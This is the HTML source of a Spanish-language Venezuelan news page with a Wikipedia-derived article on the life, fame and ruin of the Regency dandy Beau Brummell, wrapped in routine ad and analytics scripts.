
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="es_VE">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="description" content="Las últimas noticias de Maracaibo Venezuela en Economía, Política, Deportes, Farándula, Tecnología, Nacionales, las 24 horas del día" />
<meta http-equiv="Keywords" content="Noticia al Día,Noticias del Zulia,últimas noticias,Chavez,Noticias Maracaibo,Noticias Venezuela,Periódico Digital Zulia,brollos Maracaibo,noticias 24h,noticias,Maduro,Chavismo, Maracucho, internet,noticiaaldia,funvisis,internacionales,nacionales,farándula,al dia,política,zulia, Maduro, Guaido" />
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="Refresh" content="1600;url=https://noticialdia.com" />
<meta name="alexaVerifyID" content="C6B6IwOXCeA-DJwXmAtl3gDpK-8" />
<meta name="country" content="Venezuela" />
<meta name="rating" content="general" />
<meta name="audience" content="all" />
<meta name="language" content="spanish" />
<meta name="robots" content="index,follow" />
<meta name="googlebot" content="index,follow" />
<meta name="copyright" content="&copy; 2020 Noticia al Día" />
<meta name="author" content="Noticia al Dia" />
<meta name="credits" content="Noticia al Dia" />
<meta name="organization" content="Noticia al Dia" />
<meta name="distribution" content="global" />
<meta name="google-site-verification" content="LMDk-mKM2vWCdERk__KFbU0G6JZ5pW226kobNPi472E" />
<script src="/cdn-cgi/apps/head/GICUlKaMJTTX82dtOFGQouxSlMU.js"></script><script async custom-element="amp-analytics" src="https://cdn.ampproject.org/v0/amp-analytics-0.1.js"></script>
<link rel="stylesheet" href="https://cdn.noticialdia.com/styles/style.css" type="text/css" media="screen" />
<link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@600&display=swap" rel="stylesheet">

<link rel="shortcut icon" href="https://cdn.noticialdia.com/images/favicon.ico" />
<link rel="alternate" type="application/rss+xml" title="Noticia Al Dia RSS Feed" href="https://feeds2.feedburner.com/NoticiaAlDia" />

<script type="text/javascript">
_atrk_opts = { atrk_acct:"HzuOh1aIE700Gu", domain:"noticialdia.com",dynamic: true};
(function() { var as = document.createElement('script'); as.type = 'text/javascript'; as.async = true; as.src = "https://certify-js.alexametrics.com/atrk.js"; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(as, s); })();
</script>
<noscript><img src="https://certify.alexametrics.com/atrk.gif?account=HzuOh1aIE700Gu" style="display:none" height="1" width="1" alt="" /></noscript>


<script async src="https://cdn.insurads.com/bootstrap/KJSAWK2H.js"></script>


<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script>
<script>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</script>
<script data-ad-client="ca-pub-6382505032242105" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>


<style>
@media (max-width: 1280px) {
#lateral_izquierdo {
display:none;
}
#lateral_derecho {
display:none;
}
	}
	</style>


<style>	
	@media (max-width: 420px) {
#wrapper
		{
			padding:0 0 5px 5px;
			width:98%;
			margin: 0 0 0 0;
		}
.featuredposts_content .fpost
		{
			padding:5px 0 5px 0;
		}		
#featuredposts_content
			.featuredposts_content .fpost .wp-caption aligncenter
		{
		width:100%;
	}
					.featuredposts_content .fpost .wp-caption-text
		{
		width:375px;
	}
		.featuredposts_content .fpost div
	{
		width:100%;
		padding:0;
	}
		.featuredposts_content .fpost img
	{
		width:100%;
		max-width:375px;
	}
			

#todaysNewsposts_content
		{
			position:none;
		}
		.todaysNewsposts_content .thumb
		{
			left:5px;
		}
		.todaysNewsposts_content .fpost
		{
			left:5px;
		}


#widget_A {
display:none;
}


#ad_Feature_Middlebar_468x60 {
display:none;
}
		
#rightColumn {
	max-width:100%;
	width:360px;
    background:whitesmoke;
		}
		.rightColumn .thumbNews
		{
			margin:5px;
			
		}
 .rightColumn .thumbNews .content .thumbNewsposts_category_under
		{
			border-top: 5px solid #4389d4;
			
		}

#menubg {
display:none;
}

		#logo {
			background-size:70%;
			top:25px;
		}
	}	

</style>
<style>	
	@media (max-width: 375px) {
#wrapper
		{
			padding:0 0 5px 5px;
			width:98%;
			margin: 0 0 0 0;
		}
.featuredposts_content .fpost
		{
			padding:5px 0 5px 0;
		}		
#featuredposts_content
			.featuredposts_content .fpost .wp-caption aligncenter
		{
		width:100%;
	}
					.featuredposts_content .fpost .wp-caption-text
		{
		width:375px;
	}
		.featuredposts_content .fpost div
	{
		width:100%;
		padding:0;
	}
		.featuredposts_content .fpost img
	{
		width:100%;
		max-width:375px;
	}
			

#todaysNewsposts_content
		{
			position:none;
		}
		.todaysNewsposts_content .thumb
		{
			left:5px;
		}
		.todaysNewsposts_content .fpost
		{
			left:5px;
		}


#ad_Feature_Middlebar_468x60 {
display:none;
}

#widget_A {
display:none;
}
		
#rightColumn {
	max-width:100%;
	width:360px;
	background:whitesmoke;	
		}
		.rightColumn .thumbNews
		{
			margin:5px;
		}
.rightColumn .thumbNews .content .thumbNewsposts_category_under
		{
			border-top: 5px solid #4389d4;
			
		}
#menubg {
display:none;
}

		#logo {
			background-size:70%;
			top:25px;
		}
	}	

</style>

<script>
  var _comscore = _comscore || [];
  _comscore.push({ c1: "2", c2: "19764680" });
  (function() {
    var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
    s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
    el.parentNode.insertBefore(s, el);
  })();
</script>
<noscript>
  <img src="http://b.scorecardresearch.com/p?c1=2&c2=19764680&cv=2.0&cj=1" />
</noscript>

<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />

<title>La fascinante historia de El bello Brummell: El hombre mas elegante de la historia murió loco y pobre</title>
<meta name="description" content="La fascinante historia de El bello Brummell: El hombre mas elegante de la historia murió loco y pobre" />
<link rel="canonical" href="https://noticialdia.com/2021/03/la-fascinante-historia-de-el-bello-brummell-el-hombre-mas-elegante-de-la-historia-murio-loco-y-pobre/" />
<meta property="og:locale" content="es_ES" />
<meta property="og:type" content="article" />
<meta property="og:title" content="La fascinante historia de El bello Brummell: El hombre mas elegante de la historia murió loco y pobre" />
<meta property="og:description" content="La fascinante historia de El bello Brummell: El hombre mas elegante de la historia murió loco y pobre" />
<meta property="og:url" content="https://noticialdia.com/2021/03/la-fascinante-historia-de-el-bello-brummell-el-hombre-mas-elegante-de-la-historia-murio-loco-y-pobre/" />
<meta property="og:site_name" content="noticia al dia" />
<meta property="article:publisher" content="https://www.facebook.com/noticiaaldia/" />
<meta property="article:published_time" content="2021-03-24T19:13:27+00:00" />
<meta property="og:image" content="https://cdn.noticialdia.com/wp-content/uploads/2021/03/George-Bryan-Brummell-3-225x300.jpg" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:creator" content="@noticiaaldia" />
<meta name="twitter:site" content="@noticiaaldia" />
<meta name="twitter:label1" content="Escrito por">
<meta name="twitter:data1" content="jcarrillo">
<meta name="twitter:label2" content="Tiempo estimado de lectura">
<meta name="twitter:data2" content="5 minutos">
<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://noticialdia.com/#website","url":"https://noticialdia.com/","name":"noticia al dia","description":"Noticias de Maracaibo y Sucesos del Zulia las 24 horas al dia en Venezuela","potentialAction":[{"@type":"SearchAction","target":"https://noticialdia.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"es"},{"@type":"ImageObject","@id":"https://noticialdia.com/2021/03/la-fascinante-historia-de-el-bello-brummell-el-hombre-mas-elegante-de-la-historia-murio-loco-y-pobre/#primaryimage","inLanguage":"es","url":"https://cdn.noticialdia.com/wp-content/uploads/2021/03/George-Bryan-Brummell-3-225x300.jpg"},{"@type":"WebPage","@id":"https://noticialdia.com/2021/03/la-fascinante-historia-de-el-bello-brummell-el-hombre-mas-elegante-de-la-historia-murio-loco-y-pobre/#webpage","url":"https://noticialdia.com/2021/03/la-fascinante-historia-de-el-bello-brummell-el-hombre-mas-elegante-de-la-historia-murio-loco-y-pobre/","name":"La fascinante historia de El bello Brummell: El hombre mas elegante de la historia muri\u00f3 loco y pobre","isPartOf":{"@id":"https://noticialdia.com/#website"},"primaryImageOfPage":{"@id":"https://noticialdia.com/2021/03/la-fascinante-historia-de-el-bello-brummell-el-hombre-mas-elegante-de-la-historia-murio-loco-y-pobre/#primaryimage"},"datePublished":"2021-03-24T19:13:27+00:00","dateModified":"2021-03-24T19:13:27+00:00","author":{"@id":"https://noticialdia.com/#/schema/person/3d0122e0a473005e5386996dde8cbc87"},"description":"La fascinante historia de El bello Brummell: El hombre mas elegante de la historia muri\u00f3 loco y pobre","breadcrumb":{"@id":"https://noticialdia.com/2021/03/la-fascinante-historia-de-el-bello-brummell-el-hombre-mas-elegante-de-la-historia-murio-loco-y-pobre/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https://noticialdia.com/2021/03/la-fascinante-historia-de-el-bello-brummell-el-hombre-mas-elegante-de-la-historia-murio-loco-y-pobre/"]}]},{"@type":"BreadcrumbList","@id":"https://noticialdia.com/2021/03/la-fascinante-historia-de-el-bello-brummell-el-hombre-mas-elegante-de-la-historia-murio-loco-y-pobre/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"item":{"@type":"WebPage","@id":"https://noticialdia.com/","url":"https://noticialdia.com/","name":"Portada"}},{"@type":"ListItem","position":2,"item":{"@type":"WebPage","@id":"https://noticialdia.com/2021/03/la-fascinante-historia-de-el-bello-brummell-el-hombre-mas-elegante-de-la-historia-murio-loco-y-pobre/","url":"https://noticialdia.com/2021/03/la-fascinante-historia-de-el-bello-brummell-el-hombre-mas-elegante-de-la-historia-murio-loco-y-pobre/","name":"La fascinante historia de El bello Brummell: El hombre mas elegante de la historia muri\u00f3 loco y pobre"}}]},{"@type":"Person","@id":"https://noticialdia.com/#/schema/person/3d0122e0a473005e5386996dde8cbc87","name":"jcarrillo","image":{"@type":"ImageObject","@id":"https://noticialdia.com/#personlogo","inLanguage":"es","url":"https://secure.gravatar.com/avatar/c29e4da3ee4e2d2fceeab396c1a5b127?s=96&d=mm&r=g","caption":"jcarrillo"},"sameAs":["http://noticiaaldia.com"]}]}</script>

<link rel='dns-prefetch' href='//ajax.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/noticialdia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.7"}};
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='wgs2-css' href='https://cdn.noticialdia.com/wp-content/plugins/wp-google-search/wgs2.css.gzip' type='text/css' media='all' />
<link rel='stylesheet' id='sby_styles-css' href='https://cdn.noticialdia.com/wp-content/plugins/feeds-for-youtube/css/sb-youtube.min.css.gzip' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='https://cdn.noticialdia.com/wp-includes/css/dist/block-library/style.min.css.gzip' type='text/css' media='all' />
<link rel='stylesheet' id='awsm-ead-public-css' href='https://cdn.noticialdia.com/wp-content/plugins/embed-any-document/css/embed-public.min.css.gzip' type='text/css' media='all' />
<link rel='stylesheet' id='perfect-pullquotes-styles-css' href='https://cdn.noticialdia.com/wp-content/plugins/perfect-pullquotes/perfect-pullquotes.css.gzip' type='text/css' media='all' />
<link rel='stylesheet' id='wp-polls-css' href='https://cdn.noticialdia.com/wp-content/plugins/wp-polls/polls-css.css.gzip' type='text/css' media='all' />
<style id='wp-polls-inline-css' type='text/css'>
.wp-polls .pollbar {
	margin: 1px;
	font-size: 8px;
	line-height: 10px;
	height: 10px;
	background-image: url('https://cdn.noticialdia.com/wp-content/plugins/wp-polls/images/default_gradient/pollbg.gif');
	border: 1px solid #c8c8c8;
}

</style>
<link rel='stylesheet' id='wpt-twitter-feed-css' href='https://cdn.noticialdia.com/wp-content/plugins/wp-to-twitter/css/twitter-feed.css.gzip' type='text/css' media='all' />
<link rel='stylesheet' id='wp-pagenavi-css' href='https://cdn.noticialdia.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css.gzip' type='text/css' media='all' />
<script type='text/javascript' src='https://cdn.noticialdia.com/wp-content/plugins/jquery-updater/js/jquery-3.6.0.min.js.gzip' id='jquery-core-js'></script>
<script type='text/javascript' src='https://cdn.noticialdia.com/wp-content/plugins/jquery-updater/js/jquery-migrate-3.3.2.min.js.gzip' id='jquery-migrate-js'></script>
<link rel="https://api.w.org/" href="https://noticialdia.com/wp-json/" /><link rel="alternate" type="application/json" href="https://noticialdia.com/wp-json/wp/v2/posts/1775238" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://noticialdia.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://cdn.noticialdia.com/wp-includes/wlwmanifest.xml.gzip" />
<meta name="generator" content="WordPress 5.7" />
<link rel='shortlink' href='https://noticialdia.com/?p=1775238' />
<link rel="alternate" type="application/json+oembed" href="https://noticialdia.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fnoticialdia.com%2F2021%2F03%2Fla-fascinante-historia-de-el-bello-brummell-el-hombre-mas-elegante-de-la-historia-murio-loco-y-pobre%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://noticialdia.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fnoticialdia.com%2F2021%2F03%2Fla-fascinante-historia-de-el-bello-brummell-el-hombre-mas-elegante-de-la-historia-murio-loco-y-pobre%2F&#038;format=xml" />
<link rel="alternate" href="https://noticialdia.com/2021/03/la-fascinante-historia-de-el-bello-brummell-el-hombre-mas-elegante-de-la-historia-murio-loco-y-pobre/" hreflang="x-default" /><link rel="icon" href="https://cdn.noticialdia.com/wp-content/uploads/2018/12/cropped-unnamed-5-32x32.jpg" sizes="32x32" />
<link rel="icon" href="https://cdn.noticialdia.com/wp-content/uploads/2018/12/cropped-unnamed-5-192x192.jpg" sizes="192x192" />
<link rel="apple-touch-icon" href="https://cdn.noticialdia.com/wp-content/uploads/2018/12/cropped-unnamed-5-180x180.jpg" />
<meta name="msapplication-TileImage" content="https://cdn.noticialdia.com/wp-content/uploads/2018/12/cropped-unnamed-5-270x270.jpg" />
<style>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</style><script>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</script></head>
<body topmargin="0">

<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = 'https://connect.facebook.net/es_LA/sdk.js#xfbml=1&version=v2.11&appId=220275781343723';
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>


<script type="text/javascript">
  window._taboola = window._taboola || [];
  _taboola.push({article:'auto'});
  !function (e, f, u, i) {
    if (!document.getElementById(i)){
      e.async = 1;
      e.src = u;
      e.id = i;
      f.parentNode.insertBefore(e, f);
    }
  }(document.createElement('script'),
  document.getElementsByTagName('script')[0],
  '//cdn.taboola.com/libtrc/noticiaaldia/loader.js',
  'tb_loader_script');
</script>


<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/245837125/noticiaaldia.com/noticiaaldia.com_Video/noticiaaldia.com_Container', [1, 1], 'div-gpt-ad-1614885427408-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>

<div id='div-gpt-ad-1614885427408-0' style='width: 1px; height: 1px;'>
<script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1614885427408-0'); });
  </script>
</div>


<div id="ad_Header_768x90">
<div id='div-gpt-ad-1579894430084-0'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1579894430084-0'); });
</script>
</div></div>
<div id="lateral_izquierdo">
<div id='div-gpt-ad-1579894688297-0'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1579894688297-0'); });
</script>
</div>
</div>
<div id="lateral_derecho">
<div id='div-gpt-ad-1579894532419-0'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1579894532419-0'); });
</script>
</div>
</div>
<div id="headerbg">
<div id="header">
<a href="https://noticialdia.com" title="Noticia Al Dia" id="logo"></a>
<div id="toplinks" style="top:6px; right:0px;">
</div>
<div id="date">Mi&eacute;rcoles, 24 de Marzo de 2021</div>
<div style="left:700px;width: 300px;height: 70px;padding-left: 70%;padding-top: 10px;">
<div class="gcse-searchbox">
<div class="wgs_wrapper" id="wgs_widget_wrapper_id"><div class="gcse-search" data-resultsUrl="https://noticialdia.com/?page_id=1772740"></div></div> </div>
</div>
</div>
</div>

<div id="menubg">
<div id="menu">
<ul><li class="current-cat"><a href="https://noticialdia.com/" title="Al Dia">Al Dia</a></li><li><a href="https://noticialdia.com/secciones/al-dia/" title="Resumen">Resumen</a></li><li class="cat-item cat-item-14"><a href="https://noticialdia.com/secciones/zulia/" title="Ver todas las entradas de Zulia">Zulia</a></li><li class="cat-item cat-item-1"><a href="https://noticialdia.com/secciones/politica/" title="Noticias al Dia del acontecer politico regional y nacional">Pol&iacute;tica</a></li><li class="cat-item cat-item-6"><a href="https://noticialdia.com/secciones/nacionales/" title="Inf&oacute;rmate con las &uacute;ltimas noticias nacionales">Nacionales</a></li><li class="cat-item cat-item-8"><a href="https://noticialdia.com/secciones/economia/" title="Toda la actualidad de la econom&iacute;a regional y nacional">Econom&iacute;a</a></li><li class="cat-item cat-item-34"><a href="https://noticialdia.com/secciones/opinion/" title="Ver todas las entradas de Opini&oacute;n">Opini&oacute;n</a></li><li class="cat-item cat-item-8"><a href="https://noticialdia.com/secciones/especiales/" title="Avances Especiales">Especiales</a></li><li class="cat-item cat-item-5"><a href="https://noticialdia.com/secciones/farandula/" title="Tus eventos sociales al dia">Far&aacute;ndula</a></li><li class="cat-item cat-item-9"><a href="https://noticialdia.com/secciones/deportes/" title="Informaci&oacute;n al dia de todo tipo de deporte">Deportes</a>
</li><li class="cat-item cat-item-4"><a href="https://noticialdia.com/secciones/internacionales/" title="La mas actual informaci&oacute;n a nivel mundial">Internacionales</a></li></ul>
</div>
</div>

<div id="ad_Header_768x90">
<div id='div-gpt-ad-1579894344828-0'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1579894344828-0'); });
</script>
</div></div>
<div id="wrapper">
<div id="bigcolumn">
<div class="page-all">
<div class="page-top">
<div class="containerI">
<div id="post-1775238" class="singlepost">
<div class="metadata">&nbsp;
<span class="time">marzo 24, 2021 - 3:13 pm</span>

</div>
<div class="thumbNewsposts_category_under">
<a href="https://noticialdia.com/secciones/cultura/" rel="category tag">Cultura</a> | <a href="https://noticialdia.com/secciones/curiosidades/" rel="category tag">Curiosidades</a>
</div>
<h1><a href="https://noticialdia.com/2021/03/la-fascinante-historia-de-el-bello-brummell-el-hombre-mas-elegante-de-la-historia-murio-loco-y-pobre/">La fascinante historia de El bello Brummell: El hombre mas elegante de la historia murió loco y pobre</a></h1>
<p><img loading="lazy" class="alignleft size-medium wp-image-1775241" src="https://cdn.noticialdia.com/wp-content/uploads/2021/03/George-Bryan-Brummell-3-225x300.jpg" alt="" width="225" height="300" srcset="https://cdn.noticialdia.com/wp-content/uploads/2021/03/George-Bryan-Brummell-3-225x300.jpg 225w, https://cdn.noticialdia.com/wp-content/uploads/2021/03/George-Bryan-Brummell-3-360x480.jpg 360w, https://cdn.noticialdia.com/wp-content/uploads/2021/03/George-Bryan-Brummell-3.jpg 420w" sizes="(max-width: 225px) 100vw, 225px" /></p>
<p style="text-align: justify;">Se le catalogó como el más célebre «petrimetre» de todos los tiempos.<br />
Petrimetre: Persona joven que se preocupa en exceso de su aspecto y de vestir según la moda.</p>
<p style="text-align: justify;">George Bryan Brummell, conocido como Beau Brummell («el bello Brummell») (Londres, 7 de junio de 1778 – Caen, 30 de marzo de 1840) (61 años), fue el árbitro de la moda en la Inglaterra de la Regencia y amigo del príncipe Regente, que accedió al trono en 1820 como Jorge</p>
<p style="text-align: justify;">Su abuelo fue tendero en la parroquia de Saint James. Su padre fue secretario privado de Lord North y, después, gobernador de Berkshire, cargo en el que atesoró una fortuna considerable. Desde sus primeros años de vida se interesó grandemente por la moda, y en especial por sus propios atuendos.</p>
<p style="text-align: justify;">Con doce años fue enviado a Eton, donde se hizo popular y fue llamado «Buck Brummell». Allí conoció al hombre que marcaría su destino, el futuro Jorge IV. Estudió posteriormente en Oxford donde, a su reputación como hombre a la moda, añadió otra como ingenioso y de lengua afilada. Regresó a Londres e inició una intensa vida social, profundizando su amistad con el Príncipe de Gales. Ingresó en el ejército, donde ascendió al grado de capitán. Decidió abandonarlo porque no le permitía cumplir con sus múltiples obligaciones sociales. Con veintiún años heredó 30.000 libras al fallecer su padre. Con el apoyo del Príncipe de Gales y con la inmensa fortuna heredada, inicia la extraña carrera que perfeccionó como un arte.</p>
<p style="text-align: justify;">Auge<br />
Beau Brummell empezó así una brillante carrera como ministro de la moda y el gusto. La nobleza, los poderosos y las mujeres bellas se rendían ante sus dictados. Era un dandi, un exhibicionista, un ingenioso, verdaderamente original, que no dudó un solo instante de su buen gusto por las ropas, ni del deseo de imponer ese gusto a los demás, ni de dejar de gastar parte de su fortuna en su ropa.<br />
El retrato que le hizo John Cock lo muestra en la cumbre de su gloria y de su arte. Abogó por la higiene personal sin falta y se bañaba diariamente, como Cleopatra, en una bañera repleta de leche.</p>
<p style="text-align: justify;">A Brummell se le atribuye la creación del traje moderno de caballero vestido con corbata o algún tipo de pañuelo anudado al cuello; también el haberlo puesto de moda.[cita requerida] Este traje se viste ahora en casi todo el mundo en ocasiones formales y de negocios.</p>
<p style="text-align: justify;">El Regente-Príncipe de Gales tartamudeó cuando Brummell le dijo que no le gustaba el corte de chaqueta de cola. En un baile, la parte posterior del vestido de la duquesa de Rutland ofendió su buen gusto. La hizo retirarse, ayudada por sus lacayos. Nunca trabajó. Ser dandi es una profesión de tiempo completo.</p>
<p style="text-align: justify;">Nada más lejos de su mente las ropas con líneas y excéntricas o colores histéricos. Aspiraba al difícil y quizás imposible arte de pasar notoriamente desapercibido («conspicuosly inconspicuous»). Pudo haberlo logrado alguna noche, o tal vez algunos momentos, durante su vida, que vivió como un sueño.</p>
<p style="text-align: justify;">Relación con Jorge IV</p>
<p style="text-align: justify;">Jorge IV fue conocido en su juventud como Prinny, y era también un dandi. Asumió el trono después de ser el Regente durante varios años, tras ser declarado su padre, el rey, legalmente incapaz. Vano y egocéntrico, mandó a construir un salón de banquetes en Brighton (Royal Pavilion), que con su delirante decoración oriental competía con cualquiera en el mundo. Jorge IV servía comidas pantagruélicas de hasta más de cien platos: comía hasta hartarse y, ahíto, se hacía sangrar por sus médicos «para evitar la congestión».</p>
<p style="text-align: justify;">El rey era obeso, caprichoso, dilapidador, adicto a dar bailes y cenas, mujeriego compulsivo, hiperbólico en su tendencia a autoadornarse; aparecía en sus fiestas empolvado y con el pelo rizado. Vestía de satén rosa, con la chaqueta adornada de abalorios y con el sombrero saturado de lentejuelas. Brummell trató de ordenar esa exuberancia. Se hicieron amigos íntimos. El príncipe lo colocó, en pago, en la mejor sociedad londinense. Soportó todas las insolencias de Brummell, e incluso las aplaudió; al fin, como era de esperar, se pelearon.</p>
<p style="text-align: justify;">La caída</p>
<p style="text-align: justify;">Al final, la fortuna de Brummell no fue capaz de soportar tan desenfrenado tren de vida. Con treinta y ocho años perdió tanto su fortuna como el favor del rey. Los acreedores comenzaron a acosar su casa. Brummell no salía de su casa sino de noche, ya que de día ésta se encontraba rodeada de una turbamulta de zapateros, joyeros, sastres, hacedores de botas y comerciantes de vinos. En 1816, con treinta y ocho años y para evitar la prisión por deudas, pues debía miles de libras, huyó a Calais (Francia). Normalmente las deudas de juego de Brummell, como «deudas de honor», se pagaban de forma inmediata. La excepción a esto fue su apuesta final, que data de marzo de 1815 en el libro de apuestas de White&#8217;s, que está marcado como «no pagada, 20 de enero de 1816».</p>
<p style="text-align: justify;">Vivió el resto de su vida en el exilio francés, pasando diez años en Calais sin un pasaporte oficial. Allí trató de vestir con un mínimo decoro pero su ruina era ya completa. Fue al fin a la cárcel.</p>
<p style="text-align: justify;">Fue nombrado cónsul en Caen gracias a la influencia de Lord Alvanley, segundo barón Alvanley y del marqués de Worcester, ya en el reinado de Guillermo IV. Esto le proporcionó una pequeña renta anual. Este nombramiento duró dos años antes de que Brummell recomendara que el Foreign Office aboliera el consulado en Caen, con la esperanza de ser trasladado a una posición con más beneficio en otro lugar. El consulado fue abolido, pero no le dieron ningún otro cargo.</p>
<p style="text-align: justify;">Rápidamente Brummell se quedó sin dinero y acabó en la prisión por deudas, donde lo llevaron sus acreedores de Calais. Sólo la caritativa intervención de sus amigos en Inglaterra le proporcionó cierto alivio. Dejó de vestirse, bañarse y afeitarse. De noche, en el mísero cuarto de la pensión, organizaba simulacros de las grandes cenas que había vivido. Después de dos apoplejías de origen sifilítico, Beau Brummell murió sin dinero, y enloquecido por la sífilis en el asilo de caridad pública del Bon Saveur en Caen en 1840.</p>
<p style="text-align: justify;">Wikipedia</p>
<p style="text-align: justify;"><img loading="lazy" class="size-medium wp-image-1775242 aligncenter" src="https://cdn.noticialdia.com/wp-content/uploads/2021/03/14c7b73ded9bc08c537ab7229d7c84a1-200x300.jpg" alt="" width="200" height="300" srcset="https://cdn.noticialdia.com/wp-content/uploads/2021/03/14c7b73ded9bc08c537ab7229d7c84a1-200x300.jpg 200w, https://cdn.noticialdia.com/wp-content/uploads/2021/03/14c7b73ded9bc08c537ab7229d7c84a1-320x480.jpg 320w, https://cdn.noticialdia.com/wp-content/uploads/2021/03/14c7b73ded9bc08c537ab7229d7c84a1.jpg 333w" sizes="(max-width: 200px) 100vw, 200px" /></p>
<div class="clear"></div>
</div>

<div id="ad_Topcomments_468x60">
<center>
<table width="600" border="0" cellpadding="5">
<tr>
<td>
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-5456771896815354" data-ad-slot="1462211647" data-ad-format="auto"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script> </td>
<td>
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-5456771896815354" data-ad-slot="2938944842" data-ad-format="auto"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
</td>

</tr>
</table>
</center>
</div>


<div>
<center>
<div id="taboola-below-article-thumbnails"></div>
<script type="text/javascript">
  window._taboola = window._taboola || [];
  _taboola.push({
    mode: 'thumbnails-a',
    container: 'taboola-below-article-thumbnails',
    placement: 'Below Article Thumbnails',
    target_type: 'mix'
  });
</script>
</center>
</div>
</div>
</div>
</div>
<div class="page-bottom"></div>
<div class="clear"></div>
</div>
<div id="sidebar">
<div align="center"> <br />
